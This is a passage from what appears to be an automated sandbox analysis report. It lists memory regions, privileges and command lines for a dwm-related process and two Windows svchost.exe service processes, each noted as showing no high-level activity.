| private_0x000000ca580f0000 | 0xca580f0000 | 0xca585e1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca585f0000 | 0xca585f0000 | 0xca58ae1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca58af0000 | 0xca58af0000 | 0xca58af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca58b00000 | 0xca58b00000 | 0xca58b00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca58b20000 | 0xca58b20000 | 0xca58b20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca58b30000 | 0xca58b30000 | 0xca58b30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ca58b60000 | 0xca58b60000 | 0xca58b63fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca58b70000 | 0xca58b70000 | 0xca58b73fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca58ba0000 | 0xca58ba0000 | 0xca58d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca58da0000 | 0xca58da0000 | 0xca58daffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca58db0000 | 0xca58db0000 | 0xca58dbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca58dc0000 | 0xca58dc0000 | 0xca58dcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca590f0000 | 0xca590f0000 | 0xca590f3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca59110000 | 0xca59110000 | 0xca59113fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca59120000 | 0xca59120000 | 0xca59123fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca59130000 | 0xca59130000 | 0xca5932efff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca59330000 | 0xca59330000 | 0xca5933ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca59340000 | 0xca59340000 | 0xca5934ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000ca59350000 | 0xca59350000 | 0xca5935ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ca59360000 | 0xca59360000 | 0xca5936ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca59370000 | 0xca59370000 | 0xca5937ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca59380000 | 0xca59380000 | 0xca593bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca593c0000 | 0xca593c0000 | 0xca593cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca593e0000 | 0xca593e0000 | 0xca593effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ca59640000 | 0xca59640000 | 0xca5983efff | Pagefile Backed Memory | rw |
|
|
|
- |
| staticcache.dat | 0xca598f0000 | 0xca5a92ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ca5ad90000 | 0xca5ad90000 | 0xca5af1bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca5af20000 | 0xca5af20000 | 0xca5b01ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca5b020000 | 0xca5b020000 | 0xca5b11ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca5b120000 | 0xca5b120000 | 0xca5b19ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca5b1a0000 | 0xca5b1a0000 | 0xca5b21ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca5b220000 | 0xca5b220000 | 0xca5b29ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ca5b2c0000 | 0xca5b2c0000 | 0xca5b2c6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffaa0000 | 0x7df5ffaa0000 | 0x7ff5ffa9ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7d1a20000 | 0x7ff7d1a20000 | 0x7ff7d1a2ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff7d1a30000 | 0x7ff7d1a30000 | 0x7ff7d1a3ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff7d1a40000 | 0x7ff7d1a40000 | 0x7ff7d1a4ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ff7d1a58000 | 0x7ff7d1a58000 | 0x7ff7d1a59fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7d1a5a000 | 0x7ff7d1a5a000 | 0x7ff7d1a5bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7d1a5c000 | 0x7ff7d1a5c000 | 0x7ff7d1a5dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7d1a5e000 | 0x7ff7d1a5e000 | 0x7ff7d1a5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7d1a60000 | 0x7ff7d1a60000 | 0x7ff7d1b5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7d1b60000 | 0x7ff7d1b60000 | 0x7ff7d1b82fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7d1b83000 | 0x7ff7d1b83000 | 0x7ff7d1b83fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7d1b84000 | 0x7ff7d1b84000 | 0x7ff7d1b85fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7d1b86000 | 0x7ff7d1b86000 | 0x7ff7d1b87fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7d1b8a000 | 0x7ff7d1b8a000 | 0x7ff7d1b8bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7d1b8e000 | 0x7ff7d1b8e000 | 0x7ff7d1b8ffff | Private Memory | rw |
|
|
|
- |
| dwm.exe | 0x7ff7d2b20000 | 0x7ff7d2b32fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7ffaef4e0000 | 0x7ffaef506fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffaef9c0000 | 0x7ffaef9f5fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7ffaefcd0000 | 0x7ffaf0214fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ffaf0ac0000 | 0x7ffaf0acafff | Memory Mapped File | rwx |
|
|
|
- |
| uianimation.dll | 0x7ffaf1ce0000 | 0x7ffaf1d2afff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x7ffaf1d30000 | 0x7ffaf1ee1fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7ffaf1ef0000 | 0x7ffaf215dfff | Memory Mapped File | rwx |
|
|
|
- |
| dxgi.dll | 0x7ffaf2160000 | 0x7ffaf21fbfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7ffaf2200000 | 0x7ffaf24a2fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ffaf24b0000 | 0x7ffaf24d1fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmghost.dll | 0x7ffaf24e0000 | 0x7ffaf24f5fff | Memory Mapped File | rwx |
|
|
|
- |
| ninput.dll | 0x7ffaf2500000 | 0x7ffaf255bfff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffaf2560000 | 0x7ffaf2627fff | Memory Mapped File | rwx |
|
|
|
- |
| dcomp.dll | 0x7ffaf2630000 | 0x7ffaf2700fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmcore.dll | 0x7ffaf2710000 | 0x7ffaf28e3fff | Memory Mapped File | rwx |
|
|
|
- |
| udwm.dll | 0x7ffaf28f0000 | 0x7ffaf29c2fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmredir.dll | 0x7ffaf29d0000 | 0x7ffaf29fbfff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ffaf2b90000 | 0x7ffaf2c07fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffaf2d10000 | 0x7ffaf2da5fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 3 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #43: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #43 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x318 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
8F0
0x
ED8
0x
E74
0x
884
0x
BE4
0x
9E4
0x
A74
0x
528
0x
7AC
0x
848
0x
738
0x
260
0x
8A0
0x
89C
0x
7F8
0x
7B8
0x
7B4
0x
79C
0x
774
0x
74C
0x
740
0x
728
0x
6A0
0x
64C
0x
638
0x
628
0x
620
0x
600
0x
5EC
0x
5D0
0x
5B4
0x
5A4
0x
55C
0x
4F0
0x
4EC
0x
130
0x
18C
0x
168
0x
11C
0x
FC
0x
F8
0x
F4
0x
3FC
0x
3E8
0x
3C8
0x
3C4
0x
3C0
0x
3BC
0x
3A0
0x
31C
0x
B0
0x
6D0
0x
5CC
0x
844
0x
724
0x
960
0x
8E8
0x
E68
0x
F64
0x
FDC
0x
B4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000cb80000000 | 0xcb80000000 | 0xcb800fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb80100000 | 0xcb80100000 | 0xcb801fffff | Private Memory | rw |
|
|
|
- |
| vsstrace.dll.mui | 0xcb80200000 | 0xcb80208fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000cb80210000 | 0xcb80210000 | 0xcb80210fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000cb80220000 | 0xcb80220000 | 0xcb8029ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000cb802a0000 | 0xcb802a0000 | 0xcb802a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000cb802b0000 | 0xcb802b0000 | 0xcb802b6fff | Private Memory | rw |
|
|
|
- |
| activeds.dll.mui | 0xcb802c0000 | 0xcb802c1fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll | 0xcb802d0000 | 0xcb802d4fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0xcb802e0000 | 0xcb802effff | Memory Mapped File | r |
|
|
|
- |
| mswsock.dll.mui | 0xcb802f0000 | 0xcb802f2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000cb80300000 | 0xcb80300000 | 0xcb803fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb80400000 | 0xcb80400000 | 0xcb804fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb80500000 | 0xcb80500000 | 0xcb805fffff | Private Memory | rw |
|
|
|
- |
| datastore.edb | 0xcb80600000 | 0xcb8060ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80610000 | 0xcb8061ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80620000 | 0xcb8062ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80630000 | 0xcb8063ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80640000 | 0xcb8064ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80650000 | 0xcb8065ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80660000 | 0xcb8066ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80670000 | 0xcb8067ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80680000 | 0xcb8068ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80690000 | 0xcb8069ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb806a0000 | 0xcb806affff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb806b0000 | 0xcb806bffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb806c0000 | 0xcb806cffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb806d0000 | 0xcb806dffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb806e0000 | 0xcb806effff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb806f0000 | 0xcb806fffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80700000 | 0xcb8070ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80710000 | 0xcb8071ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80720000 | 0xcb8072ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80730000 | 0xcb8073ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80740000 | 0xcb8074ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80750000 | 0xcb8075ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80760000 | 0xcb8076ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80770000 | 0xcb8077ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80780000 | 0xcb8078ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80790000 | 0xcb8079ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb807a0000 | 0xcb807affff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb807b0000 | 0xcb807bffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb807c0000 | 0xcb807cffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb807d0000 | 0xcb807dffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb807e0000 | 0xcb807effff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb807f0000 | 0xcb807fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000cb80800000 | 0xcb80800000 | 0xcb808fffff | Private Memory | rw |
|
|
|
- |
| datastore.edb | 0xcb80900000 | 0xcb8090ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80910000 | 0xcb8091ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80920000 | 0xcb8092ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80930000 | 0xcb8093ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80940000 | 0xcb8094ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80950000 | 0xcb8095ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80960000 | 0xcb8096ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80970000 | 0xcb8097ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80980000 | 0xcb8098ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80990000 | 0xcb8099ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb809a0000 | 0xcb809affff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb809b0000 | 0xcb809bffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb809c0000 | 0xcb809cffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb809d0000 | 0xcb809dffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb809e0000 | 0xcb809effff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb809f0000 | 0xcb809fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000cb80a00000 | 0xcb80a00000 | 0xcb80afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000cb80b00000 | 0xcb80b00000 | 0xcb80b01fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000cb80b10000 | 0xcb80b10000 | 0xcb80b11fff | Pagefile Backed Memory | r |
|
|
|
- |
| newdev.dll.mui | 0xcb80b20000 | 0xcb80b26fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000cb80b30000 | 0xcb80b30000 | 0xcb80b30fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000cb80b40000 | 0xcb80b40000 | 0xcb80b40fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000cb80b50000 | 0xcb80b50000 | 0xcb80b57fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb80b60000 | 0xcb80b60000 | 0xcb80b66fff | Private Memory | rw |
|
|
|
- |
| datastore.edb | 0xcb80b70000 | 0xcb80b7ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80b80000 | 0xcb80b8ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80b90000 | 0xcb80b9ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80ba0000 | 0xcb80baffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80bb0000 | 0xcb80bbffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xcb80bc0000 | 0xcb80bcffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000cb80bf0000 | 0xcb80bf0000 | 0xcb80bfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb80c00000 | 0xcb80c00000 | 0xcb80cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb80d00000 | 0xcb80d00000 | 0xcb80dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb80e00000 | 0xcb80e00000 | 0xcb80efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb80f00000 | 0xcb80f00000 | 0xcb80ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81000000 | 0xcb81000000 | 0xcb810fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81100000 | 0xcb81100000 | 0xcb811fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81200000 | 0xcb81200000 | 0xcb812fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81300000 | 0xcb81300000 | 0xcb813fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81400000 | 0xcb81400000 | 0xcb814fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81500000 | 0xcb81500000 | 0xcb815fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000cb81600000 | 0xcb81600000 | 0xcb816fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81780000 | 0xcb81780000 | 0xcb817c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000cb817d0000 | 0xcb817d0000 | 0xcb817dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb817e0000 | 0xcb817e0000 | 0xcb817effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb817f0000 | 0xcb817f0000 | 0xcb817fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81800000 | 0xcb81800000 | 0xcb8180ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81810000 | 0xcb81810000 | 0xcb8181ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81820000 | 0xcb81820000 | 0xcb8182ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000cb81830000 | 0xcb81830000 | 0xcb81836fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81840000 | 0xcb81840000 | 0xcb818bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb818c0000 | 0xcb818c0000 | 0xcb818cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb818d0000 | 0xcb818d0000 | 0xcb818d0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb818e0000 | 0xcb818e0000 | 0xcb818e0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb818f0000 | 0xcb818f0000 | 0xcb818f3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81900000 | 0xcb81900000 | 0xcb819fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81b00000 | 0xcb81b00000 | 0xcb81b01fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81b10000 | 0xcb81b10000 | 0xcb81b10fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81b20000 | 0xcb81b20000 | 0xcb81b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81b30000 | 0xcb81b30000 | 0xcb81b37fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81b40000 | 0xcb81b40000 | 0xcb81b46fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81c50000 | 0xcb81c50000 | 0xcb81ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81cd0000 | 0xcb81cd0000 | 0xcb81d1cfff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000cb81d20000 | 0xcb81d20000 | 0xcb81d26fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81d30000 | 0xcb81d30000 | 0xcb81d7cfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81d80000 | 0xcb81d80000 | 0xcb81d8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81d90000 | 0xcb81d90000 | 0xcb81d9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81da0000 | 0xcb81da0000 | 0xcb81daffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81db0000 | 0xcb81db0000 | 0xcb81dbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81dc0000 | 0xcb81dc0000 | 0xcb81dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000cb81dd0000 | 0xcb81dd0000 | 0xcb81ddffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000cb81e00000 | 0xcb81e00000 | 0xcb81efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb81f00000 | 0xcb81f00000 | 0xcb81ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb82070000 | 0xcb82070000 | 0xcb820effff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb82100000 | 0xcb82100000 | 0xcb821fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb82200000 | 0xcb82200000 | 0xcb822fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb82300000 | 0xcb82300000 | 0xcb823fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb82400000 | 0xcb82400000 | 0xcb824fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb82500000 | 0xcb82500000 | 0xcb825fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb82600000 | 0xcb82600000 | 0xcb835fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb83600000 | 0xcb83600000 | 0xcb836fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb83c00000 | 0xcb83c00000 | 0xcb83c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb83c30000 | 0xcb83c30000 | 0xcb87c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb87c30000 | 0xcb87c30000 | 0xcb8bc2ffff | Private Memory | rw |
|
|
|
- |
| usocore.dll.mui | 0xcb8bc60000 | 0xcb8bc60fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000cb8bc70000 | 0xcb8bc70000 | 0xcb8bc71fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000cb8bd10000 | 0xcb8bd10000 | 0xcb8bd8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8bd90000 | 0xcb8bd90000 | 0xcb8bd9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8bda0000 | 0xcb8bda0000 | 0xcb8bdaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8bdb0000 | 0xcb8bdb0000 | 0xcb8bdbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8bdc0000 | 0xcb8bdc0000 | 0xcb8bdcffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8bdd0000 | 0xcb8bdd0000 | 0xcb8bddffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8bde0000 | 0xcb8bde0000 | 0xcb8bde7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8bdf0000 | 0xcb8bdf0000 | 0xcb8bdfffff | Private Memory | rw |
|
|
|
- |
| msxml6r.dll | 0xcb8be00000 | 0xcb8be00fff | Memory Mapped File | r |
|
|
|
- |
| wuaueng.dll.mui | 0xcb8be10000 | 0xcb8be13fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000cb8be20000 | 0xcb8be20000 | 0xcb8be37fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8beb0000 | 0xcb8beb0000 | 0xcb8beb6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8bf00000 | 0xcb8bf00000 | 0xcb8bffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8c000000 | 0xcb8c000000 | 0xcb8c0fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8c100000 | 0xcb8c100000 | 0xcb8c1fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000cb8c900000 | 0xcb8c900000 | 0xcb8c9fffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 329 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #44: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #44 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x340 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DD4
0x
F94
0x
F88
0x
6D8
0x
830
0x
540
0x
78C
0x
384
0x
378
0x
8
0x
27C
0x
254
0x
250
0x
128
0x
3DC
0x
3B8
0x
3B4
0x
3B0
0x
39C
0x
38C
0x
344
0x
EFC
0x
DB4
0x
1A4
0x
FB8
0x
B40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
